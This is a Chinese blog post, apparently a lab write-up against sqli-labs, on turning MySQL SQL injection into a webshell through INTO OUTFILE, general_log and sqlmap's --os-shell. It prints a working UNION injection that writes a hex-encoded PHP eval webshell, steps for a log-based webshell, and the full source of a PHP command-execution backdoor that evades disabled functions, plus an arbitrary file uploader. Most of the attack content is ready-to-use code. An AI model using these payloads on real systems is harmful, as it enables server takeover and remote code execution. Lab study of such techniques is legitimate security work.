sql注入getshell

已于 2024-04-18 11:33:13 修改
阅读量473 收藏 5
点赞数 3
分类专栏: WEB 靶场 文章标签: android
于 2024-04-17 22:57:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IDHALASHAO/article/details/137892320
版权
WEB 同时被 2 个专栏收录
15 篇文章 0 订阅
订阅专栏
靶场
11 篇文章 0 订阅
订阅专栏

into outfile

条件:

web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空

以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出

show global variables like '%secure%';

在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可

id=1' and 1=2 union select 1,2,'shell内容' into outfile "绝对路径\shell.php" %23
eg: http://192.168.52.183/sqli-labs/Less-7/?id=-3')) union select 1,0x3c3f706870206576616c28245f524551554553545b27696b756e275d293b3f3e20,3 into outfile   'C:\\phpstudy_pro\\WWW\\outfile.php' --+

这里进行16进制转换,因此是0X开头,写入“<?php eval($_REQUEST['ikun']);?> ” ,到相应路径,这里还要双斜杠转义:C:\phpstudy_pro\WWW\outfile.php,然后访问这个:outfile.php 路径

 

 

日志shell写入

outfile被禁止,或者写入文件被拦截;必须是root权限

show variables like '%general%';  #查看配置
​
set global general_log = on;  #开启general log模式
​
set global general_log_file = '../../?.php';   #设置日志目录为shell地址

写入shell:

select '<?php eval($_POST['kun']);?>'    

连接

--os-shell

  • 知道网站路径且有写入权限

  • 高权限数据库用户

  • secure_file_priv无限制(为空)

其实可以看出和上面的大同小异。

--sql-shell

因此可以使用 --sql-shell 进行一些判断

python sqlmap.py -u http://192.168.52.183/sqli-labs/Less-1/?id=1 --sql-shell

1.查看存在哪些用户

SELECT user, host FROM mysql.user;

2.查看文件路径(mysql/data的路径,根目录一般与mysql处于同一目录)

3.查看secure_file_priv的值是否为空。这里是空的,假如返回的是NULL则就不能使用了

select @@secure_file_priv;

在网站根目录下随机生成的;

一个是RCE;整理后的如下:

<?php
// 获取传入的命令
$c = $_REQUEST["cmd"];
// 设置脚本最大执行时间和忽略用户中止
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set("max_execution_time", 0);
// 获取禁用的函数列表
$z = @ini_get("disable_functions");
if (!empty($z)) {
    $z = preg_replace("/[, ]+/", ',', $z);
    $z = explode(',', $z);
    $z = array_map("trim", $z);
} else {
    $z = array();
}
// 将命令追加错误输出
$c = $c . " 2>&1\n";
// 函数检查器,检查函数是否存在且未被禁用
function f($n)
{
    global $z;
    return is_callable($n) and !in_array($n, $z);
}
// 检查可执行系统命令的函数
if (f("system")) {
    ob_start();
    system($c);
    $w = ob_get_clean();
} elseif (f("proc_open")) {
    // 使用 proc_open 函数执行命令
    $y = proc_open($c, array(array("pipe", "r"), array("pipe", "w"), array("pipe", "w")), $t);
    $w = NULL;
    while (!feof($t[1])) {
        $w .= fread($t[1], 512);
    }
    @proc_close($y);
} elseif (f("shell_exec")) {
    // 使用 shell_exec 函数执行命令
    $w = shell_exec($c);
} elseif (f("passthru")) {
    ob_start();
    passthru($c);
    $w = ob_get_clean();
} elseif (f("popen")) {
    // 使用 popen 函数执行命令
    $x = popen($c, "r");
    $w = NULL;
    if (is_resource($x)) {
        while (!feof($x)) {
            $w .= fread($x, 512);
        }
    }
    @pclose($x);
} elseif (f("exec")) {
    // 使用 exec 函数执行命令
    $w = array();
    exec($c, $w);
    $w = join(chr(10), $w) . chr(10);
} else {
    // 如果没有可用的函数,则返回 0
    $w = 0;
}
// 输出结果
echo "<pre>$w</pre>";
?>

一个是可进行文件上传的交互;源码如下:

<?php
// 开始 PHP 代码块
// 检查是否设置了上传参数
if (isset($_REQUEST["upload"])) {
    // 获取上传目录
    $dir = $_REQUEST["uploadDir"];
    // 检查 PHP 版本是否小于 4.1.0
    if (phpversion() < '4.1.0') {
        // PHP 版本小于 4.1.0,使用旧的全局变量
        $file = $HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
    } else {
        // PHP 版本大于等于 4.1.0,使用 $_FILES 数组
        $file = $_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
    }
    // 设置上传文件权限为 0755
    @chmod($dir . "/" . $file, 0755);
    // 输出文件上传成功消息
    echo "File uploaded";
} else {
    // 如果未设置上传参数,则显示上传表单
    echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=C:\\phpstudy_pro\\www\\> <input type=submit name=upload value=upload></form>";
}
// 结束 PHP 代码块
?>

参考:

https://blog.csdn.net/m0_56415977/article/details/126491794

摘星怪sec
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入GetShell的方法(1)
forinput的博客
05-06 3668
SQL注入getshell的五中方式
sql注入getshell的几种方式
热门推荐
good good study
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
WEB安全基础入门—操作系统命令注入(shell 注入)
xnxqwzy的博客
04-24 1134
攻击者可在服务器端执行任意系统(OS)命令,获取敏感数据。通常攻击者会尝试利用系统内部的信任关系,将攻击转移到系统内的其他系统,获取更大权限。
渗透测试|sql注入Getshell的几种方式
jennycisp的博客
11-03 1560
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell
SQL注入】从注入到获取服务器shell,记一次完整的SQL注入攻击过程
kkza的博客
10-28 2098
注入 以pikachu为例,首先发现一个数据查询的点,对其进行手工验证 易知存在SQL注入shell 通过mysql写入文件需满足 连接数据库是root用户 my.ini配置文件需明确secure_file_priv="目录",参考:MySQL读写文件 ...
SQL注入写webshell
柠檬i的博客
08-06 684
`INTO OUTFILE`是MySQL中用于将查询结果输出到文件的语法。它允许将查询结果写入到服务器文件系统中的指定文件。
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
1. **参数化查询**:使用预处理语句防止SQL注入,同时确保命令执行操作只接受预期的参数。 2. **输入验证**:对所有用户输入进行严格的检查和清理,拒绝非法字符或格式。 3. **最小权限原则**:应用和服务应运行在...
sql注入的思维导图。
04-19
SQL注入思维导图 SQL注入是一种常见的Web应用程序安全漏洞, attackers可以通过在Web应用程序的输入字段中Inject恶意的SQL代码来访问、修改或控制数据库中的数据。本文将对SQL注入的思维导图进行详细的讲解,并对...
防范SQL注入.pptx
10-27
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序未能有效过滤用户输入数据的漏洞,使得攻击者可以执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。以下是对防范SQL注入的...
高级SQL注入shell,一般黑客不知道。<哈客>
weixin_30868855的博客
08-11 120
服务器只有一个站,又找不到注入点怎么办? 你可以试试在搜索框,登陆,任何框框里放个单引号,看看是否报错 初级部分 加个单引号',后面随便,随便填个密码,点击登陆 典型的SQL注入判断权限: ' and user>0-- ...
SQL注入写WebShell方式小结
Mi1k7ea
12-09 2万+
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union select 1,'&lt;?php eval($_POST[a]);?&gt;' INTO OUTFILE '/var/www/tmp/nb.php'# sqlmap写shell 前提都是需要对目标目录具有写权限。 -...
SQL注入写入文件方法(获取webshell
Goodric的博客
04-08 2575
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
MySQL注入shell的条件
最新发布
huang0612123的博客
05-13 289
HVV面试
sql注入shell条件与方法(统计)
Vdieoo的博客
10-30 7755
条件: 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。 要了解secure_file_priv是否支...
注入神器-----SqlMap的使用
weixin_54227009的博客
05-28 1350
sqlmap GET参数: -u 网址 --dbs:获取注入点的所有数据库 -D:指定数据库 --tables:获取指定的表 -T:表名 --columns:获取表的指定字段 -C:获取指定字段 --dump:把数据打印出来 POST注入: 先抓包, 注入点的位置打个*号 然后保存为txt文档 -r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点 --current-db:获取当前数据库 sqlmap获取sh...
sql注入详解
m0_67392811的博客
06-12 5832
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入教程】mysql注入直接getshell
dfdhxb995397的博客
08-30 1561
Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在实际环境中我只遇过一次,为了做实验,我把php.ini文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值